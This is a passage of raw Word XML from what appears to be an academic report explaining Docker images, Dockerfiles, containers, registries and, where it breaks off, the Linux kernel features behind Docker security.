      </w:r>
      <w:r w:rsidR="00842C90">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00102BA3">
        <w:t>published by other</w:t>
      </w:r>
      <w:r w:rsidR="009A11AC">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005E7301">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009514FD">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00102BA3">
        <w:t xml:space="preserve"> shared via the Docker hub</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1295255404"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008032CC">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008032CC">
            <w:instrText xml:space="preserve"> CITATION DNü20 \l 2057  \m CZh18</w:instrText>
          </w:r>
          <w:r w:rsidR="00FE0853">
            <w:instrText xml:space="preserve"> \m DSk19</w:instrText>
          </w:r>
          <w:r w:rsidR="008032CC">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[25, 26, 27]</w:t>
          </w:r>
          <w:r w:rsidR="008032CC">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00102BA3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F03625">
        <w:t xml:space="preserve"> The layered structure of </w:t>
      </w:r>
      <w:r w:rsidR="00BA6774">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F03625">
        <w:t>Docker image is shown in figure 4, where multiple containers are running on the writable layer</w:t>
      </w:r>
      <w:r w:rsidR="00BA6774">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F03625">
        <w:t xml:space="preserve"> all sharing the same </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00F03625">
        <w:t xml:space="preserve"> image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E17C1B2" w14:textId="69CD85BB" w:rsidR="005E7301" w:rsidRDefault="005E7301" w:rsidP="005E7301">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73A92FA6" wp14:editId="001B09FE">
            <wp:extent cx="3666839" cy="25576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8699" cy="2558918"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C903AE4" w14:textId="2A051751" w:rsidR="00F03625" w:rsidRPr="00F03625" w:rsidRDefault="00F03625" w:rsidP="00F03625">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc86858595"/>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Docker image layers</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1795354235"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00F03625">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00F03625">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION doc20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00F03625">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[28]</w:t>
          </w:r>
          <w:r w:rsidRPr="00F03625">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="65C87F1F" w14:textId="54F716B2" w:rsidR="00E66A4B" w:rsidRDefault="00E66A4B" w:rsidP="009D1EB2">
      <w:r>
        <w:t xml:space="preserve">The Dockerfile </w:t>
      </w:r>
      <w:r w:rsidR="0080469C">
        <w:t>is similar to a script, consisting of various commands and parameters to create a base Docker image.</w:t>
      </w:r>
      <w:r w:rsidR="00476379">
        <w:t xml:space="preserve"> It specifies the instructions in a sequential order with key attributes, such as </w:t>
      </w:r>
      <w:r w:rsidR="00A16F28">
        <w:t>ports, file directory, base OS, and many others.</w:t>
      </w:r>
      <w:r w:rsidR="007F548D">
        <w:t xml:space="preserve"> Usually, a Dockerfile starts with FROM command, defining the base OS of the image</w:t>
      </w:r>
      <w:r w:rsidR="000F3ABC">
        <w:t xml:space="preserve">. The subsequent layers </w:t>
      </w:r>
      <w:r w:rsidR="00F17826">
        <w:t xml:space="preserve">also specify instructions to execute </w:t>
      </w:r>
      <w:r w:rsidR="00903F25">
        <w:t>and run the application</w:t>
      </w:r>
      <w:r w:rsidR="00060543">
        <w:t>, such as port</w:t>
      </w:r>
      <w:r w:rsidR="002B7561">
        <w:t xml:space="preserve"> entry</w:t>
      </w:r>
      <w:r w:rsidR="00060543">
        <w:t>, copy files, directory, and add files</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1187791217"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F95091">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F95091">
            <w:instrText xml:space="preserve"> CITATION SBh18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F95091">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[29]</w:t>
          </w:r>
          <w:r w:rsidR="00F95091">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00060543">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006E3101">
        <w:t xml:space="preserve"> The screenshot below shows a sample of Dockerfile. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119C0D5D" w14:textId="20096994" w:rsidR="0030422A" w:rsidRDefault="0030422A" w:rsidP="0030422A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C049457" wp14:editId="7822DD74">
            <wp:extent cx="3519477" cy="175773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2030" cy="1783979"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424118F" w14:textId="5A8264D7" w:rsidR="006E3101" w:rsidRDefault="006E3101" w:rsidP="006E3101">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc86858596"/>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: sample Dockerfile.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="050C2113" w14:textId="64727623" w:rsidR="006E3101" w:rsidRDefault="006E3101" w:rsidP="006E3101">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc86859254"/>
      <w:r>
        <w:t>Containers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="2BAA56BF" w14:textId="7505DC51" w:rsidR="00BA3876" w:rsidRDefault="002A33E1" w:rsidP="00955EA7">
      <w:r>
        <w:t xml:space="preserve">A container is the </w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t>critical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> object in the Docker system and is built by images.</w:t>
      </w:r>
      <w:r w:rsidR="001201F1">
        <w:t xml:space="preserve"> Containers </w:t>
      </w:r>
      <w:r w:rsidR="00AB268A">
        <w:t xml:space="preserve">package an application’s </w:t>
      </w:r>
      <w:r w:rsidR="007204A4">
        <w:t xml:space="preserve">software into a virtualised runtime environment with </w:t>
      </w:r>
      <w:r w:rsidR="003C14E0">
        <w:t>all packages</w:t>
      </w:r>
      <w:r w:rsidR="00AB268A">
        <w:t xml:space="preserve"> and dependencies </w:t>
      </w:r>
      <w:r w:rsidR="007204A4">
        <w:t>needed to run an application</w:t>
      </w:r>
      <w:r w:rsidR="003C14E0">
        <w:t xml:space="preserve">. Each container runs in its </w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t xml:space="preserve">virtualised </w:t>
      </w:r>
      <w:r w:rsidR="003C14E0">
        <w:t>environment, completely isolated from the host and other containers.</w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="00F50863">
        <w:t xml:space="preserve">they can </w:t>
      </w:r>
      <w:r w:rsidR="00DE0A8A">
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidR="00F50863">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D09AE">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00F50863">
        <w:t xml:space="preserve">each other or the host over a network. </w:t>
      </w:r>
      <w:r w:rsidR="00BE2F55">
        <w:t>Containers run on the writable layer without modifying the base image. This implies</w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="007E2247">
        <w:t xml:space="preserve">a container can have </w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t>various</w:t>
      </w:r>
      <w:r w:rsidR="007E2247">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00026056">
        <w:t>lifecycles</w:t>
      </w:r>
      <w:r w:rsidR="007E2247">
        <w:t>, such as stop, delete, create, start</w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t xml:space="preserve">, and are </w:t>
      </w:r>
      <w:r w:rsidR="00302210">
        <w:t>managed</w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t xml:space="preserve"> using API or CLI.</w:t>
      </w:r>
      <w:r w:rsidR="00F50863">
        <w:t xml:space="preserve"> Consequently, containers are ephemeral, unlike images</w:t>
      </w:r>
      <w:r w:rsidR="00BA3876">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1636673492"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BA3876">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BA3876">
            <w:instrText xml:space="preserve">CITATION JSp19 \m NKh19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00BA3876">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[30, 31]</w:t>
          </w:r>
          <w:r w:rsidR="00BA3876">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00BA3876">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C728C6" w14:textId="5D42EFD8" w:rsidR="008557B4" w:rsidRDefault="00BA3876" w:rsidP="00955EA7">
      <w:r>
        <w:t>In Docker, d</w:t>
      </w:r>
      <w:r w:rsidR="006E1715">
        <w:t xml:space="preserve">ata </w:t>
      </w:r>
      <w:r w:rsidR="00302210">
        <w:t>cannot be</w:t>
      </w:r>
      <w:r w:rsidR="006E1715">
        <w:t xml:space="preserve"> retrieved </w:t>
      </w:r>
      <w:r w:rsidR="00302210">
        <w:t xml:space="preserve">once a container is deleted or stopped </w:t>
      </w:r>
      <w:r w:rsidR="006E1715">
        <w:t xml:space="preserve">unless persistent storage is </w:t>
      </w:r>
      <w:r w:rsidR="00DE0A8A">
        <w:t xml:space="preserve">attached </w:t>
      </w:r>
      <w:r w:rsidR="006E1715">
        <w:t>to s</w:t>
      </w:r>
      <w:r w:rsidR="00DE0A8A">
        <w:t>ave</w:t>
      </w:r>
      <w:r w:rsidR="006E1715">
        <w:t xml:space="preserve"> the changes.</w:t>
      </w:r>
      <w:r w:rsidR="009E5924">
        <w:t xml:space="preserve"> However, Docker uses volumes to save the data permanently. </w:t>
      </w:r>
      <w:r w:rsidR="000C3022">
        <w:t xml:space="preserve">Containers are </w:t>
      </w:r>
      <w:r w:rsidR="000601AD">
        <w:t>portable, small, and fast to spin up because they do not require a guest OS</w:t>
      </w:r>
      <w:r w:rsidR="00EA2B6D">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="000601AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA2B6D">
        <w:t>instead, they use the host’s OS resources and features</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-486011134"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00EA2B6D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">CITATION Mud19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00EA2B6D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[32]</w:t>
          </w:r>
          <w:r w:rsidR="00EA2B6D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00EA2B6D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E302CB" w14:textId="3971A9CD" w:rsidR="00955EA7" w:rsidRDefault="008557B4" w:rsidP="008557B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc86859255"/>
      <w:r>
        <w:t>Registries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="588BF4EA" w14:textId="2A78471E" w:rsidR="008557B4" w:rsidRDefault="008578FE" w:rsidP="008557B4">
      <w:r>
        <w:t>Docker registry is a service responsible for hosting and distributing images. It is an online store of Docker images.</w:t>
      </w:r>
      <w:r w:rsidR="00A441CD">
        <w:t xml:space="preserve"> Users and developers can use the CLI to pull</w:t>
      </w:r>
      <w:r w:rsidR="005034A9">
        <w:t xml:space="preserve"> and run images locally</w:t>
      </w:r>
      <w:r w:rsidR="0042404A">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00A441CD">
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidR="005034A9">
        <w:t xml:space="preserve"> images</w:t>
      </w:r>
      <w:r w:rsidR="00A441CD">
        <w:t xml:space="preserve"> to the registry.</w:t>
      </w:r>
      <w:r w:rsidR="0042404A">
        <w:t xml:space="preserve"> The registries can be private or publicly accessible, but the Docker engine uses the Docker hub as its public registry by default.</w:t>
      </w:r>
      <w:r w:rsidR="009B5E3F">
        <w:t xml:space="preserve"> However, users can also interact privately using </w:t>
      </w:r>
      <w:r w:rsidR="00D65196">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="009B5E3F">
        <w:t>trusted registry to maintain and secure their images.</w:t>
      </w:r>
      <w:r w:rsidR="00E76132">
        <w:t xml:space="preserve"> Docker uses </w:t>
      </w:r>
      <w:r w:rsidR="00D65196">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00E76132">
        <w:t>tag to identify multiple versions of the same image</w:t>
      </w:r>
      <w:r w:rsidR="00D65196">
        <w:t>, and in case a user does not specify the tag, Docker picks the latest version automatically.</w:t>
      </w:r>
      <w:r w:rsidR="00DD5B6F">
        <w:t xml:space="preserve"> The tag feature allows users to select the right version of a particular image from the Docker Hub. For example, </w:t>
      </w:r>
      <w:r w:rsidR="004F602D">
        <w:t xml:space="preserve">a user can use a tag to differentiate multiple versions of Nginx server. Usually, </w:t>
      </w:r>
      <w:r w:rsidR="00364F04">
        <w:t>users can pull or push images using API calls</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1752387840"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00364F04">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00364F04">
            <w:instrText xml:space="preserve"> CITATION ABA17 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00010263">
            <w:instrText xml:space="preserve"> \m NMo21</w:instrText>
          </w:r>
          <w:r w:rsidR="00364F04">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[33, 34]</w:t>
          </w:r>
          <w:r w:rsidR="00364F04">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00364F04">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E88FD7D" w14:textId="433F11EC" w:rsidR="00AF1C64" w:rsidRDefault="0099358C" w:rsidP="00D92488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc86859256"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DOCKER AND KERNEL SECURITY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="0B8EC521" w14:textId="5A51DCA6" w:rsidR="00287B1D" w:rsidRDefault="002F56D0" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">According in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-113910603"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BB518F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BB518F">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00BB518F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35]</w:t>
          </w:r>
          <w:r w:rsidR="00BB518F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00BB518F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008D005D">
        <w:t xml:space="preserve">Docker security </w:t>
      </w:r>
      <w:r w:rsidR="00921113">
        <w:t xml:space="preserve">relies on several key factors, mainly </w:t>
      </w:r>
      <w:r w:rsidR="006155FB">
        <w:t xml:space="preserve">isolation, </w:t>
      </w:r>
      <w:r w:rsidR="00554383">
        <w:t xml:space="preserve">Docker daemon </w:t>
      </w:r>
      <w:r w:rsidR="00EA529E">
        <w:t xml:space="preserve">attack surface, misconfiguration in the containers, and </w:t>
      </w:r>
      <w:r w:rsidR="000048B0">
        <w:t>hardening network operations security.</w:t>
      </w:r>
      <w:r w:rsidR="003B38E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB686E">
        <w:t>As mentioned above, Docker containers are created based upon Linux</w:t>
      </w:r>
      <w:r w:rsidR="00855153">
        <w:t xml:space="preserve"> kernel</w:t>
      </w:r>
      <w:r w:rsidR="00CB686E">
        <w:t xml:space="preserve"> features and capabilities and thus share similar security characteristics.</w:t>
      </w:r>
      <w:r w:rsidR="006A4F80">
        <w:t xml:space="preserve"> Therefore, it is essential to explore and understand the security features of Linux </w:t>
      </w:r>
      <w:r w:rsidR="00855153">
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidR="00757688">
        <w:t xml:space="preserve">. The existence of Docker is </w:t>
      </w:r>
      <w:r w:rsidR="001A264F">
        <w:t xml:space="preserve">heavily reliant on </w:t>
      </w:r>
      <w:r w:rsidR="00D9197A">
        <w:t>various</w:t>
      </w:r>
      <w:r w:rsidR="001A264F">
        <w:t xml:space="preserve"> Linux properties, </w:t>
      </w:r>
      <w:r w:rsidR="00D9197A">
        <w:t>especially</w:t>
      </w:r>
      <w:r w:rsidR="001A264F">
        <w:t xml:space="preserve"> namespace</w:t>
      </w:r>
      <w:r w:rsidR="00D9197A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001A264F">
        <w:t>control groups (Cgroups)</w:t>
      </w:r>
      <w:r w:rsidR="00D9197A">
        <w:t>, and capabilities</w:t>
      </w:r>
      <w:r w:rsidR="001A264F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0017104E">
        <w:t xml:space="preserve"> The namespaces isolate </w:t>
      </w:r>
      <w:r w:rsidR="00751260">
        <w:t xml:space="preserve">each Docker container from the host machine and other containers using various </w:t>
      </w:r>
      <w:r w:rsidR="00BD5A6B">
        <w:t>LXC features</w:t>
      </w:r>
      <w:r w:rsidR="00250E7C">
        <w:t xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t>PID</w:t>
      </w:r>
      <w:r w:rsidR="00250E7C">
        <w:t>, mnt, net, and others.</w:t>
      </w:r>
      <w:r w:rsidR="00BD5A6B">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t>PID</w:t>
      </w:r>
      <w:r w:rsidR="00BD5A6B">
        <w:t xml:space="preserve"> and net namespaces are the key LXC tools </w:t>
      </w:r>
      <w:r w:rsidR="00C87B33">
        <w:t xml:space="preserve">to provide isolation for each </w:t>
      </w:r>
      <w:r w:rsidR="00224BBA">
